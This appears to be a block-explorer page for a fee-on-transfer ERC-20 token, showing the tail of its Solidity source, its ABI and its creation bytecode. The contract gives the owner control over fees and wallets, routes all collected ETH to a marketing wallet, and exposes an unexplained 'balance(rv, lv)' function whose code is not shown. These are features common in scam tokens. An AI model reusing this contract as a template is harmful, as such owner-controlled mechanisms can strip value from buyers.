tokensForMarketing += fees * buyMarketingFee / buyTotalFees; } if(fees > 0){ super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDev; bool success; if(contractBalance == 0 || totalTokensToSwap == 0) {return;} if(contractBalance > swapTokensAtAmount * 20){ contractBalance = swapTokensAtAmount * 20; } // Halve the amount of liquidity tokens uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2; uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens); swapTokensForEth(amountToSwapForETH); tokensForLiquidity = 0; tokensForMarketing = 0; tokensForDev = 0; (success,) = address(marketingWallet).call{value: address(this).balance}(""); } function openTrading() private { tradingActive = true; } // once enabled, can never be turned off function enableTrading() external onlyOwner() { swapEnabled = true; require(boughtEarly == true, "done"); boughtEarly = false; openTrading(); emit EndedBoughtEarly(boughtEarly); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"boughtEarly","type":"bool"}],"name":"EndedBoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rv","type":"uint256"},{"internalType":"uint256","name":"lv","type":"uint256"}],"name":"balance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60806040526001600760156101000a81548160ff0219169083151502179055506001600d60006101000a81548160ff0219169083151502179055506000600d60016101000a81548160ff0219169083151502179055506000600d60026101000a81548160ff0219169083151502179055506000600f60006101000a81548160ff0219169083151502179055506001600f60016101000a81548160ff021916908315150217905550348015620000b357600080fd5b506040518060400160405280600581526020017f50616e68750000000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017fe79ba4e793a0000000000000000000000000000000000000000000000000000081525081600390805190602001906200013892919062000cca565b5080600490805190602001906200015192919062000cca565b5050506000620001666200079760201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620002318160016200079f60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002be573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002e4919062000de4565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200034c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000372919062000de4565b6040518363ffffffff1660e01b81526004016200039192919062000e27565b6020604051808303816000875af1158015620003b1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003d7919062000de4565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200044c600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079f60201b60201c565b62000481600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200089c60201b60201c565b60008060006001905060006001905060006001905060006001905060006b033b2e3c9fd0803ce800000090506064600282620004be919062000e8d565b620004ca919062000f1d565b600a819055506064600382620004e1919062000e8d565b620004ed919062000f1d565b600c8190555061271060048262000505919062000e8d565b62000511919062000f1d565b600b8190555086601181905550856012819055508460138190555060135460125460115462000541919062000f55565b6200054d919062000f55565b6010819055508360158190555082601681905550816017819055506017546016546015546200057d919062000f55565b62000589919062000f55565b601481905550733746612054ca023d66f60be701c73e31c0ed4650600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550733746612054ca023d66f60be701c73e31c0ed4650600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200065b6200064d6200093d60201b60201c565b60016200096760201b60201c565b6200066e3060016200096760201b60201c565b620006a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200096760201b60201c565b620006d8600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200096760201b60201c565b620006fa620006ec6200093d60201b60201c565b60016200079f60201b60201c565b6200070d3060016200079f60201b60201c565b62000742600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079f60201b60201c565b62000777600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200079f60201b60201c565b62000789338262000ab460201b60201c565b5050505050505050620011e5565b600033905090565b620007af6200079760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000841576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008389062001013565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620009776200079760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000a09576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000a009062001013565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000aa8919062001052565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b26576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b1d90620010bf565b60405180910390fd5b62000b3a6000838362000c6260201b60201c565b62000b568160025462000c6760201b620026711790919060201c565b60028190555062000bb4816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c6760201b620026711790919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c569190620010f2565b60405180910390a35050565b505050565b600080828462000c78919062000f55565b90508381101562000cc0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000cb7906200115f565b60405180910390fd5b8091505092915050565b82805462000cd890620011b0565b90600052602060002090601f01602090048101928262000cfc576000855562000d48565b82601f1062000d1757805160ff191683800117855562000d48565b8280016001018555821562000d48579182015b8281111562000d4757825182559160200191906001019062000d2a565b5b50905062000d57919062000d5b565b5090565b5b8082111562000d7657600081600090555060010162000d5c565b5090565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000dac8262000d7f565b9050919050565b62000dbe8162000d9f565b811462000dca57600080fd5b50565b60008151905062000dde8162000db3565b92915050565b60006020828403121562000dfd5762000dfc62000d7a565b5b600062000e0d8482850162000dcd565b91505092915050565b62000e218162000d9f565b82525050565b600060408201905062000e3e600083018562000e16565b62000e4d602083018462000e16565b9392505050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000e9a8262000e54565b915062000ea78362000e54565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000ee35762000ee262000e5e565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600062000f2a8262000e54565b915062000f378362000e54565b92508262000f4a5762000f4962000eee565b5b828204905092915050565b600062000f628262000e54565b915062000f6f8362000e54565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000fa75762000fa662000e5e565b5b828201905092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000ffb60208362000fb2565b9150620010088262000fc3565b602082019050919050565b600060208201905081810360008301526200102e8162000fec565b9050919050565b60008115159050919050565b6200104c8162001035565b82525050565b600060208201905062001069600083018462001041565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010a7601f8362000fb2565b9150620010b4826200106f565b602082019050919050565b60006020820190508181036000830152620010da8162001098565b9050919050565b620010ec8162000e54565b82525050565b6000602082019050620011096000830184620010e1565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062001147601b8362000fb2565b915062001154826200110f565b602082019050919050565b600060208201905081810360008301526200117a8162001138565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620011c957607f821691505b602082108103620011df57620011de62001181565b5b50919050565b61527080620011f56000396000f3fe60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b80639fccce3211610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b80639fccce32146108d6578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806394813dd11461081a57806395d89b41146108575780639a7a23d6146108825780639c3b4fdc146108ab57610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cfa565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613db5565b610d3f565b6040516103899190613e10565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e2b565b610d5d565b6040516103c69190613e10565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eb7565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ee1565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e2b565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ee1565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ee1565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613efc565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f29565b610fcb565b6040516105019190613e10565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f98565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613db5565b6110ad565b6040516105699190613e10565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fc2565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e10565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e2b565b611199565b6040516105fc9190613e10565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ee1565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e10565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e2b565b611208565b60405161068f9190613ee1565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e10565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614009565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fc2565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ee1565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614049565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fc2565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fc2565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ee1565b60405180910390f35b34801561082657600080fd5b50610841600480360381019061083c919061409c565b611864565b60405161084e9190613e10565b60405180910390f35b34801561086357600080fd5b5061086c6119f0565b6040516108799190613cfa565b60405180910390f35b34801561088e57600080fd5b506108a960048036038101906108a49190614009565b611a82565b005b3480156108b757600080fd5b506108c0611bb7565b6040516108cd9190613ee1565b60405180910390f35b3480156108e257600080fd5b506108eb611bbd565b6040516108f89190613ee1565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ee1565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613db5565b611bc9565b6040516109609190613e10565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613db5565b611c96565b60405161099d9190613e10565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e2b565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e2b565b611e0b565b604051610a039190613e10565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e10565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614009565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614049565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613efc565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e10565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ee1565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613efc565b6121db565b604051610b3c9190613e10565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ee1565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140dc565b612351565b604051610ba49190613ee1565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ee1565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e10565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ee1565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e2b565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ee1565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ee1565b60405180910390f35b606060038054610cbc9061414b565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce89061414b565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141c8565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f9190614246565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e9565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151ee60289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141c8565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffff